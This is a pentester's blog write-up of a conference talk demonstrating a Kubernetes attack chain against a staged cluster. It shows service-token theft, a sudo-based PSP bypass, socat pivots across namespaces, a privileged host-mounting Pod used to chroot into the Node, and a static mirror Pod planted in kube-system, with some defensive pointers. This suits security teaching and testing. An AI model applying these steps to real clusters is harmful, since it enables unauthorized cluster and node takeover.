Saturday, I gave my talk titled “Command and KubeCTL: Real-World Kubernetes Security for Pentesters” at Shmoocon 2020. I’m following up with this post, which goes into more detail than I could cover in 50 minutes.
Here’s the important stuff:
This talk was designed to be a Kubernetes security talk for people doing offensive security or looking at Kubernetes security from the perspective of an attacker. It’s demo-focused: much of the talk is one long demo showing an attack chain. The goal was to have something complicated rather than simple to exploit; I wanted things to not work initially so that you had to figure out ways around them.
A few of my points:
The threats are what you make of them. The Kubernetes threat model is always up for interpretation by the deployer. I give examples of three completely differently configured environments that have different security expectations, based on very common issues we’ve identified while at NCC Group.
New tech, same security story. Kubernetes is that new technology getting deployed faster than it’s getting secured, and if the security industry wants to help the cause, we might need to update our tactics.
Real world demos for k8s should be non-linear. I demo a real-world(ish) attack chain that has a lot of steps to overcome. I want to show that it’s not just a single vulnerability that knocks the cluster over. There are things that need to be bypassed and subtle problems that come up.
There have been talks on Kubernetes security before. Ian Coldwater and Duffie Cooley @ Black Hat laid the groundwork for why we shouldn’t assume K8s is secure, Tim Allclair and Greg Castle @ KubeCon 2019 dove deeper into compromising actual workloads and the issues with trying to segregate nodes, and Brad Geesaman @ KubeCon 2017 talked about some of the ways to attack clusters. Just to name a few.
The demo is targeting a made up company that is trying to do per-namespace multi-tenancy. In short, the attack chain looks like this:
Each of the case studies in the talk was meant to show what happens after you compromise a Pod, so the demo starts by finding a web service with RCE in it and using that to take over the Pod.
Stealing the service token from its default path was relatively straightforward, except that I designed the Pod you exploit to not run as root, which meant that by default the Service Token wasn’t accessible. So I used the fsGroup feature, which changes the ownership of the service token to the group I specified. I think this matches what we’d see in the real world, but I used it mostly to speed up taking over the service token.
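As a rough sketch (not the exact manifest from the demo), the Pod spec might combine runAsNonRoot with fsGroup like this; the names and IDs are illustrative:

# Hypothetical Pod spec: the container runs as a non-root user, and fsGroup
# makes the mounted service account token group-readable by that user.
apiVersion: v1
kind: Pod
metadata:
  name: webapp            # illustrative name
  namespace: secure
spec:
  securityContext:
    runAsNonRoot: true
    runAsUser: 1000
    fsGroup: 1000         # token volume becomes group-owned by GID 1000
  containers:
  - name: webapp
    image: example/webapp # placeholder image with the vulnerable service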
I created a role in the cluster to expose the Endpoints API to make the demo easier. That’s because GKE with an LB will have a different IP for the Kubernetes API and for the exposed service I created, and I needed both. I think doing it this way is slightly better than sneaking over to my gcloud console and just asking what the IP is. In the real world, you might not even have this problem if there’s a shared IP.
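My reconstruction of that RBAC object looks something like the ClusterRole below; the names and scope are assumptions rather than the demo’s actual manifest:

# Sketch: let the compromised Pod's service account read Endpoints cluster-wide
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: endpoints-reader
rules:
- apiGroups: [""]
  resources: ["endpoints"]
  verbs: ["get", "list"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: endpoints-reader
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: endpoints-reader
subjects:
- kind: ServiceAccount
  name: default        # assuming the Pod runs as the default service account
  namespace: secure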
I wrote a script to speed up this process but it simply made a kubeconfig file that used the stolen service token. Mostly I wanted to make sure I wasn’t accidentally using the auto-updating gcloud kubeconfig file.
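The kubeconfig the script produces is roughly this shape; the server address and token are placeholders:

# Minimal kubeconfig sketch built around a stolen service account token
apiVersion: v1
kind: Config
clusters:
- name: target
  cluster:
    server: https://<api-server-ip>   # discovered via the Endpoints API
    insecure-skip-tls-verify: true    # lazy, but fine for a demo
users:
- name: stolen-sa
  user:
    token: <contents of /var/run/secrets/kubernetes.io/serviceaccount/token>
contexts:
- name: stolen
  context:
    cluster: target
    user: stolen-sa
    namespace: secure
current-context: stolen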
In my demo I used kubectl auth can-i --list -n secure to see what I can do in the context of the “secure” namespace. You can also use kubectl-access-matrix -n secure, which has much cleaner output.
This step was mainly to point out that it appears as if we have full access
to our namespace.
This was a demo that showed running something like kubectl run -it myshell --image=busybox -n secure to demonstrate that while we saw there’s a Role granting full control over the namespace, there’s still something preventing us from starting a new Pod. That something was the PSP in the next step.
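For context, a Role granting “full control” of a namespace typically looks something like this; it’s an assumption about the demo environment, not its exact manifest:

# Wildcard Role scoped to the "secure" namespace
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: namespace-admin   # illustrative name
  namespace: secure
rules:
- apiGroups: ["*"]
  resources: ["*"]
  verbs: ["*"]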
This was meant to demo what happens when you have a seemingly simple PSP that has MustRunAsNonRoot in it, but doesn’t have a rule for AllowPrivilegeEscalation=false. The second part is what prevents the use of SETUID bits in binaries. So this demo was to run a Pod as non-root, and then simply run sudo. I neglected to explain this well enough during my talk, as someone mentioned afterwards.
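A PSP with that gap might look roughly like the following; the name is illustrative and the commented-out line is the missing rule:

apiVersion: policy/v1beta1
kind: PodSecurityPolicy
metadata:
  name: restricted-ish          # illustrative name
spec:
  privileged: false
  runAsUser:
    rule: MustRunAsNonRoot      # forces non-root containers
  # allowPrivilegeEscalation: false   # absent, so setuid binaries like sudo still work
  seLinux:
    rule: RunAsAny
  supplementalGroups:
    rule: RunAsAny
  fsGroup:
    rule: RunAsAny
  volumes:
  - "*"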
This step runs kubectl port-forward -n secure myspecialpod 8080, which connects me into the custom image I deployed. I tried to explain that it’s up to you whether you want to tool up the custom image you’ve deployed, or just port-forward back out. I was doing port forwarding mostly to show that this feature exists.
The next step was to find other Pods in the cluster via nmap -sS -p 5000 -n -PN -T5 --open 10.24.0.0/16, which is obviously super specific and implies I already know the service I’m looking for. Something broader like nmap -AF 10.24.0.0/16 was going to take way too long otherwise.
This is again me attempting to get remote access into a Pod from my personal laptop. I like doing this because in a real assessment, all of my favorite tools are already on my system and if I was aiming to exploit it, I’d most likely do it this way. This runs something like:
kubectl run -n secure --image=alpine/socat socat -- -d -d tcp-listen:9999,fork,reuseaddr tcp-connect:10.24.2.3:5000
Run socat in the namespace we’ve compromised and tell it to forward to the new service we’d like to compromise; don’t worry about what namespace that service is in.
My demo shows another Pod in a different namespace that just happens to have the same RCE vulnerability as the first. Of course that’s unlikely, but you can imagine two scenarios in the real world.
First, we’ve seen services that need to be deployed into each namespace; Tiller is often deployed this way. So you compromise one namespace through the Tiller service and then go to a second namespace and find the exact same service that you can compromise there.
The second scenario is simply that you did in fact find another service, and it’s not designed to be public facing, so it has no authentication controls. Maybe this could be a Redis instance or some API endpoint that doesn’t require you to authenticate to it.
I’ve seen a lot of environments now that want to do namespace isolation at the network level. It’s possible, but it’ll depend on what technology you use. Network Policies are likely the most Kubernetes-native solution, but I see more solutions using Calico or Istio. There are lots of options, including some cloud providers letting you set Pod isolation policies as native ACLs. This is a whole separate talk, I think.
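As one hedged example of the Kubernetes-native approach, a policy that only admits traffic from Pods in the same namespace could look like this:

# Illustrative NetworkPolicy: deny ingress from other namespaces
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: same-namespace-only   # illustrative name
  namespace: secure
spec:
  podSelector: {}             # applies to every Pod in the namespace
  policyTypes:
  - Ingress
  ingress:
  - from:
    - podSelector: {}         # any Pod in this namespace; nothing from outside it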
I’m simply stealing the Service Account token again, plugging it back into my kubeconfig file, and showing that I can access a new namespace that has fewer restrictions (no PSP) than my own. I now have access to the “Default” namespace.
One of the restrictions that gets lifted in the “Default” namespace is that it allows you to run a privileged Pod. I think this is a real-world scenario because we’re not seeing many groups that block this yet. We all know it’s bad, but there often ends up being some service that needs to be deployed privileged. This step deploys a privileged Pod into the “Default” namespace.
With my privileged Pod I’m also sharing the host’s process namespace and doing a host volume mount. I try to explain this in the slides. The Node’s “/” is mounted into the container’s “/chroot” directory, meaning if you look in “/chroot” you’ll see the Node’s file system. Then chroot /chroot means that I take over the Node and can see lots of different things.
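Written out as a manifest, that privileged Pod looks roughly like this (the names and image are placeholders, not the demo’s exact spec):

apiVersion: v1
kind: Pod
metadata:
  name: priv-pod
  namespace: default
spec:
  hostPID: true                  # share the host's process namespace
  containers:
  - name: shell
    image: busybox
    command: ["sleep", "86400"]
    securityContext:
      privileged: true
    volumeMounts:
    - name: hostroot
      mountPath: /chroot         # the Node's "/" shows up here
  volumes:
  - name: hostroot
    hostPath:
      path: /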
This is the “… profit” phase. I didn’t include many slides about this because I wasn’t sure if I’d get enough time. I’m stealing information that happens to be on the GKE node and using it to further access the cluster. Then deploying a mirror Pod.
Now we’ve compromised the Node. First I alias kubectl to speed things up and point it at the kubelet’s credentials, which is how GKE will be configured when using an “UBUNTU” image, and then use the kubelet authentication token to access the cluster. The result I’m demonstrating here is that when I run kubectl get po --all-namespaces it shows me all Pods in the cluster (and the same goes for deployments, services, etc.). That’s another privilege escalation.
Then I show that running a command like kubectl run shell --image=busybox -n kube-system returns a response saying that the kubelet does not have permission to create a Pod in that namespace. This is where mirror Pods, or static Pods, come in.
This step is directly thanks to the presentation from Tim Allclair and Greg Castle that introduced me to mirror Pods; I’d recommend you go check out their talk for deeper detail. In short, you can put a yaml file in the /etc/kubernetes/manifests directory with a description of a Pod, and it will be “mirrored” into the cluster. So I created a mirror Pod with my malicious image in it.
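The file dropped into /etc/kubernetes/manifests is just an ordinary Pod description, something like this (the image and port are placeholders):

apiVersion: v1
kind: Pod
metadata:
  name: mirror-shell              # illustrative name
  namespace: kube-system
spec:
  containers:
  - name: shell
    image: example/attacker-tools # placeholder image listening on 8080
    ports:
    - containerPort: 8080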
I then run kubectl get po -n kube-system to confirm that the Pod has been deployed, and run it again with -o yaml | grep podIP to find out what IP it currently has.
Then I’m using the krew tool I wrote, called net-forward, to run a command like kubectl-net_forward -i 10.23.2.2 -p 8080. This creates a socat listener and a reverse proxy into the Pod I just deployed. To be honest, this step is mostly to demonstrate some of the nuances and weirdness of escalating access within the cluster. I could have taken over other Nodes by simply creating new privileged Pods over and over until they got scheduled onto the other Nodes I wanted.
To defend against the specific attack chain I mentioned above, here are some ideas:
Just a reminder that this is a demo that I’ve manufactured. I’m exploiting things that I’ve meant to exploit. This isn’t about CVEs and 0-days; it’s about methods and tactics for pentesters. This all ties back to the point that the three companies I created have different interpretations of the security controls that Kubernetes can provide, and that pentesting these environments is always different.